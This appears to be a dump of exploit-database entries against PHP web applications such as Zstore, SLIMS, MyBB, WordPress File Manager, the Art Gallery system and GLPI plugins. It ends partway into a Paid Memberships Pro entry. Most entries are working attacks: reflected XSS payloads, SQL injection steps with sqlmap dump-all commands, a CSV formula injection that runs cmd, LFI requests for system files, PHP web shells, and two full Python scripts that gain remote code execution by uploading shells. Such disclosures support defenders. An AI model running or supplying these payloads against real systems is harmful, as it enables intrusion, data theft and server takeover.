https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

58
exploits/php/webapps/51207.txt Normal file
View file

@ -0,0 +1,58 @@
## Exploit Title: Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.18.2023
## Vendor: https://zippy.com.ua/
## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4
## Description:
The value of manual insertion point 1 is copied into the HTML document
as plain text between tags.
The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in
the manual insertion point 1.
This input was echoed unmodified in the application's response.
## STATUS: HIGH Vulnerability
[+] Exploit:
```GET
GET /index.php?p=App%2fPages%2fChatgiflc%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a
HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```
## Proof and Exploit:
[href](https://streamable.com/tplz84)
## Reference:
[href](https://portswigger.net/web-security/cross-site-scripting/reflected)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

59
exploits/php/webapps/51211.txt Normal file
View file

@ -0,0 +1,59 @@
## Exploit Title: SLIMSV 9.5.2 - Cross-Site Scripting (XSS)
## Development: nu11secur1ty
## Date: 01.19.2023
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2
## Description:
The value of manual insertion `point 3` is copied into the HTML
document as plain text between tags.
The payload udz21<script>alert(1)</script>rk346 was submitted in
manual insertion point 3.
This input was echoed unmodified in the application's response.
The attacker can trick the already logged-in user, to visit the
exploit link that this attacker is created,
and if this already logged-in user is not actually IT or admin, this
will be the end of this system.
## STATUS: HIGH Vulnerability
[+] Exploit:
```
GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27
HTTP/1.1
Host: pwnedhost1.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;
SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4
Connection: close
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)
## Proof and Exploit:
[href](https://streamable.com/zd6e18)
## Reference:
[href](https://portswigger.net/web-security/cross-site-scripting)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

206
exploits/php/webapps/51213.py Executable file
View file

@ -0,0 +1,206 @@
# Exploit Title: MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)
# Date: 2023-01-19
# Exploit Author: lUc1f3r11 (https://github.com/FDlucifer)
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1832
# Version: MyBB 1.8.32
# Tested on: Linux
# CVE : N/A
# Detailed Analysis : https://fdlucifer.github.io/2023/01/17/mybb1-8-32-LFI-RCE/
# (1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path. to change Avatar Upload Path to /inc to bypass blacklist upload dir.
# (2). after doing that, then we are able to chain in "admin avatar upload" page: http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar, and LFI in "Edit Language Variables" page: http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english.
# (3). This chained bugs can lead to Authenticated RCE.
# (note). The user must have rights to add or update settings and update Avatar. This is tested on MyBB 1.8.32.
#
#
# Exp Usage:
# 1.first choose a png file that size less than 1kb
# 2.then merge the png file with a php simple backdoor file using the following commands
# mac@xxx-2 php-backdoor % cat simple-backdoor.php
# <?php
# if(isset($_REQUEST['cmd'])){
# echo "<getshell success>";
# $cmd = ($_REQUEST['cmd']);
# system($cmd);
# echo "<getshell success>";
# phpinfo();
# }
# ?>
# mac@xxx-2 php-backdoor % ls
# simple-backdoor.php test.png
# mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png
# mac@xxx-2 php-backdoor % file test.png
# test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
# 3.finnally run the following commands to run the exp script to get RCE output! enjoy the shell...
# python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email xxx@qq.com --file avatar_1.png --cmd "cat /etc/passwd"
import requests
import argparse
from bs4 import BeautifulSoup
from requests_toolbelt import MultipartEncoder
import re
r_clients = requests.Session()
def exploit(username, password, email, host, file, cmd):
# Adding ./inc upload path settings to bypass avatar upload path blacklists
data = {
"username" : username,
"password" : password,
"do" : "login"
}
login_txt = r_clients.post(host + "/admin/index.php", data=data).text
if "The username and password combination you entered is invalid" in login_txt:
print("[-] Login failure. Incorrect credentials supplied")
exit(0)
print("[+] Login successful!")
if "Access Denied" in login_txt:
print("[-] Supplied user doesn't have the rights to add a setting")
exit(0)
print("[*] Adding ./inc upload path settings...")
soup = BeautifulSoup(login_txt, "lxml")
my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']
print("[+] my_post_key: ", my_post_key)
print("[+] cookies: ", r_clients.cookies.get_dict())
cookies = r_clients.cookies.get_dict()
data = {
"my_post_key" : my_post_key,
"gid" : 10,
"upsetting[sigmycode]" : 1,
"upsetting[sigcountmycode]" : 1,
"upsetting[sigsmilies]" : 1,
"upsetting[sightml]" : 0,
"upsetting[sigimgcode]" : 1,
"upsetting[maxsigimages]" : 2,
"upsetting[siglength]" : 255,
"upsetting[hidesignatures]" : "",
"upsetting[hidewebsite]" : "",
"upsetting[useravatar]" : "./inc",
"upsetting[useravatardims]" : "100x100",
"upsetting[useravatarrating]" : 0,
"upsetting[maxavatardims]" : "100x100",
"upsetting[avatarsize]" : 25,
"upsetting[avatarresizing]" : "auto",
"upsetting[avataruploadpath]" : "./inc",
"upsetting[allowremoteavatars]" : 1,
"upsetting[customtitlemaxlength]" : 40,
"upsetting[allowaway]" : 1,
"upsetting[allowbuddyonly]" : 0
}
modify_settings_txt = r_clients.post(host + "/admin/index.php?module=config-settings&action=change",data=data,allow_redirects=False, cookies=cookies)
if modify_settings_txt.status_code != 302:
soup = BeautifulSoup(modify_settings_txt.text, "lxml")
error_txt = soup.find_all("div", {"class" : "error"})[0].text
print("[-] modify upload path failed. Reason: '{}'".format(error_txt))
exit(0)
print("[+] ./inc upload path settings added!")
# upload malicious avatar in admin panel
with open("test.png", "rb") as f:
image_binary = f.read()
print("[+] read image successful! ")
print("[+] image contents: ", image_binary)
filename = "test.png"
data1 = {
'my_post_key': my_post_key,
'username': username,
'email': email,
'avatar_upload': (filename, open(filename, 'rb'), 'image/png')
}
m = MultipartEncoder(data1)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": m.content_type,
"Origin": "null",
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}
upload_url = host + "/admin/index.php?module=user-users&action=edit&uid=1"
upload = r_clients.post(upload_url, data=m, allow_redirects=False, headers=headers, cookies=cookies)
if upload.status_code != 302:
soup = BeautifulSoup(upload.text, "lxml")
error_txt = soup.find_all("div", {"class" : "error"})[0].text
print("[-] upload avatar didn't work. Reason: '{}'".format(error_txt))
exit(0)
print("[+] upload malicious avatar png success!")
# commands exec and get the output, we are done finally :)
data2 = {
'my_post_key': my_post_key,
'file': file,
'lang': "english",
'editwith': "..",
'inadmin': 0
}
exec_url = host + "/admin/index.php?module=config-languages&action=edit&cmd=" + cmd
commands_exec = r_clients.post(exec_url, data=data2, cookies=cookies)
if commands_exec.status_code != 200:
soup = BeautifulSoup(commands_exec.text, "lxml")
error_txt = soup.find_all("div", {"class" : "error"})[0].text
print("[-] command exec didn't work. Reason: '{}'".format(error_txt))
exit(0)
cmd_output = re.findall(r'<getshell success>(.*?)<getshell success>', commands_exec.text, re.S)
print("[+] exec status: ", commands_exec.status_code)
print("[+] command exec success:\n\n", cmd_output[0].replace("\n", "\n"))
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--email', required=True, help="MyBB Admin CP admin's email (easy to find in admin users panal)")
parser.add_argument('--file', required=True, help="the image file name in the server that we uploaded before. (easy to find in admin users panal)")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
args = parser.parse_args()
username = args.username
password = args.password
email = args.email
file = args.file
host = args.host
cmd = "id" if args.cmd == None else args.cmd
print("""_______________________________________\n
/ MyBB 1.8.32 - Chained LFI Remote Code \ \n
\ Execution (RCE) (Authenticated) / \n
--------------------------------------- \n
\ ^__^ \n
\ (oo)\_______ \n
(__)\ )\/\ \n
||----w | \n
|| || \n
Author: lUc1f3r11
Github: https://github.com/FDlucifer""")
exploit(username, password, email, host, file, cmd)

25
exploits/php/webapps/51214.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23161
# Proof of Concept:
# 1- Install The application Art Gallery Management System Project v1.0
# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints
# 3- Now Insert XSS Payload on artname parameter.
the XSS Payload: %3Cimg%20src=1%20onerror=alert(document.domain)%3E
# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
# 5- XSS has been triggered.
# Go to this url "
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
"
XSS will trigger.

28
exploits/php/webapps/51215.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23162
# Proof of Concept:
# 1- Install The application Art Gallery Management System Project v1.0
# 2- Navigate to the product page by clicking on the "ART TYPE" by selecting any of the categories on the menu.
# 3- Now insert a single quote ( ' ) on "cid" parameter to break the database query, you will see the output is not shown.
# 4- Now inject the payload double single quote ('') in the "cid" parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output.
# 5- Now find how many columns are returned by the SQL query. this query will return 6 columns.
Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures
# 6- for manually getting data from the database insert the below payload to see the user of the database.
payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs
# 7- for automation using "SQLMAP" intercept the request and copy this request to a file called "request.txt".
# 8- now to get all database data use the below "sqlmap" command to fetch all the data.
Command: sqlmap -r request.txt -p cid --dump-all --batch
# Go to this url "
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs
"

32
exploits/php/webapps/51216.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated
# Date: 20/01/2023
# Exploit Author: Rahul Patwari
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: XAMPP / Windows 10
# CVE : CVE-2023-23163
# Proof of Concept:
# 1- Install The application Art Gallery Management System Project v1.0
# 2- Navigate to admin login page and login with the valid username and password<admin:Test@123>.
URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php
# 3- Now navigate "Manage ART TYPE" by clicking on "ART TYPE" option on left side bar.
# 4- Now click on any of the Art Type "Edit" button and you will redirect to the edit page of art type.
# 5- Now insert a single quote ( ' ) on "editid" parameter to break the database query, you will see the output is not shows.
# 6- Now inject the payload double single quote ('') in the "editid" parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output.
# 7- Now find how many column are returns by the SQL query. this query will return 6 column.
Payload:editid=6%27order%20by%203%20--%20-
# 8- For manually get data of database insert the below payload to see the user of the database.
payload: editid=-6%27union%20all%20select%201,user(),3--%20-
# 9- Now to get all database data use below "sqlmap" command to fetch all the data.
Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch

30
exploits/php/webapps/51219.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)
# Date: 17/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: CodeThemes
# Vendor Homepage: https://spondonit.com/
# Software Link: https://codecanyon.net/item/amazcart-laravel-ecommerce-system-cms/34962179
# Version: 3.4
# Tested on: Live Demo
# Demo Link : https://amazy.rishfa.com/
# Description #
AmazCart - Laravel Ecommerce System CMS 3.4 is vulnerable to Reflected
cross-site scripting because of insufficient user-supplied data
sanitization. Anyone can submit a Reflected XSS payload without login in
when searching for a new product on the search bar. This makes the
application reflect our payload in the frontend search ber, and it is fired
everything the search history is viewed.
# Proof of Concept (PoC) : Exploit #
1) Goto: https://amazy.rishfa.com/
2) Enter the following payload in 'Search Iteam box' :
"><script>alert(1)</script>
3) Now You Get a Popout as Alert 1
4) Reflected XSS payload is fired
# Image PoC : Reference Image #
1) Payload Fired: https://prnt.sc/QQaiZB3tFMVB

38
exploits/php/webapps/51220.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: ERPGo SaaS 3.9 - CSV Injection
# Date: 18/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: RajodiyaInfotech
# Vendor Homepage: https://rajodiya.com/
# Software Link: https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426
# Version: 3.9
# Tested on: Windows & Live Litespeed Web Server
# Demo Link : https://demo.rajodiya.com/erpgo-saas/login
# Description #
ERPGo is a software as a service (SaaS) platform that is vulnerable to CSV
injection attacks. This type of attack occurs when an attacker is able to
manipulate the data that is imported or exported in a CSV file, in order to
execute malicious code or gain unauthorized access to sensitive
information. This vulnerability can be exploited by an attacker by
injecting specially crafted data into a CSV file, which is then imported
into the ERPGo system. This can potentially allow the attacker to gain
access to sensitive information, such as login credentials or financial
data, or to execute malicious code on the system.
# Proof of Concept (PoC) : Exploit #
1) Go To : https://erpgo.127.0.0.1/ERPGo/register <====| Register New
account
2) Complete the Registration
3) Now Click Accounting System Then Customer
4) Now Add a New Vendors / Click Create
5) Now Add this Payload in Name : =10+20+cmd|' /C calc'!A0
6) Now Submit This Form
7) Now Download Vendors List as csv
8) Open This CSV File in excel
9) Now a Calculator will open
# Image PoC : Reference Image #
1) Payload Fired: https://prnt.sc/EkKPZiMa6yz8

73
exploits/php/webapps/51224.py Executable file
View file

@ -0,0 +1,73 @@
#!/usr/bin/env
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint
def handler(sig,frame):
print ("[!]Saliendo")
sys.exit(1)
signal.signal(signal.SIGINT,handler)
def commandexec(command):
exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
params = {
"cmd":command
}
r=requests.get(exec_url,params=params)
soup = BeautifulSoup(r.text, 'html.parser')
text = soup.get_text()
print (text)
def exploit():
global url
url = sys.argv[1]
command = sys.argv[2]
upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
headers = {
'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
'Connection': "close"
}
payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"
try:
r=requests.post(upload_url,data=payload,headers=headers)
#pprint(r.json())
commandexec(command)
except:
print("[!] Algo ha salido mal...")
def help():
print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")
if __name__ == '__main__':
if len(sys.argv) != 3:
help()
else:
exploit()

20
exploits/php/webapps/51229.txt Normal file
View file

@ -0,0 +1,20 @@
# ADVISORY INFORMATION
# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
# Date of found: 11 Jun 2022
# Application: GLPI Manageentities < 4.0.2
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/manageentities
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34127
# PoC
GET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

20
exploits/php/webapps/51230.txt Normal file
View file

@ -0,0 +1,20 @@
# ADVISORY INFORMATION
# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion
# Date of found: 11 Jun 2022
# Application: GLPI Glpiinventory <= 1.0.1
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi-inventory-plugin
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31062
# PoC
POST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

32
exploits/php/webapps/51231.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure
# Date: 11 Jun 2022
# Version: >=10.0.0 and < 10.0.2
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi
# Advisory:
https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31068
--
*Nuri Çilengir*
/Cyber Security Consultant/
*PRODAFT SARL*
*CH:* Y-Parc, rue Galilée 7, 1400 Yverdon-les-Bains
*TR:* Sanayi Mah. Teknopark Istanbul 5. Blok K2 Pendik, Istanbul
*NL:* HSD Campus Wilhelmina van Pruisenweg 104, 2595 AN, Den Haag
GSM: (+90) 553 444 7080
E.:nuri[at]prodaft[dot]com
IN:/cilengirnuri
/* In case you think youre not the designated recipient of the e-mail
hereby; please delete it accordingly./
/** This e-mail may have been sent from a mobile device. Please contact
me from my mobile, in case you notice an error in the content./
/PS. Feel free to contact me via Signal, Threema or Telegram; or ask for
my public PGP key for high-profile cases that may require higher
confidentiality./

18
exploits/php/webapps/51232.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin
# Date of found: 11 Jun 2022
# Application: GLPI Activity < 3.1.0
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/activity
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34125
# PoC
GET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

68
exploits/php/webapps/51233.txt Normal file
View file

@ -0,0 +1,68 @@
# ADVISORY INFORMATION
# Exploit Title: GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)
# Date of found: 11 Jun 2022
# Application: GLPI >=10.0.0, < 10.0.3
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31056
# PoC
POST /front/change.form.php HTTP/1.1
Host: acme.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156
Content-Length: 4836
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQ
n53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="id"
0
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_glpi_csrf_token"
752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35
-----------------------------190705055020145329172298897156
Content-Disposition: form-data; name="_actors"
{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}
-----------------------------190705055020145329172298897156--
If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows.
POST /ajax/fileupload.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841
Content-Length: 559
Origin: http://acme.com
Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="name"
_uploader_filename
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="showfilesize"
1
-----------------------------102822935214007887302871396841
Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"
Content-Type: application/x-php
Output:
<?php echo system($_GET['cmd']); ?>
-----------------------------102822935214007887302871396841--
# POC URL
http://192.168.56.113/files/_tmp/poc.php?cmd=

22
exploits/php/webapps/51234.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: GLPI Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date of found: 11 Jun 2022
# Application: GLPI Cartography < 6.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/positions
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-34128
# PoC
POST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 39
Origin: http://192.168.56.113
Connection: close
<?php echo system($_GET["cmd"]); ?>

55
exploits/php/webapps/51235.py Executable file
View file

@ -0,0 +1,55 @@
#!/usr/bin/env python
# Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
# Exploit Author: r3nt0n
# CVE: CVE-2023-23488
# Date: 2023/01/24
# Vulnerability discovered by Joshua Martinelle
# Vendor Homepage: https://www.paidmembershipspro.com
# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
# Version: < 2.9.8
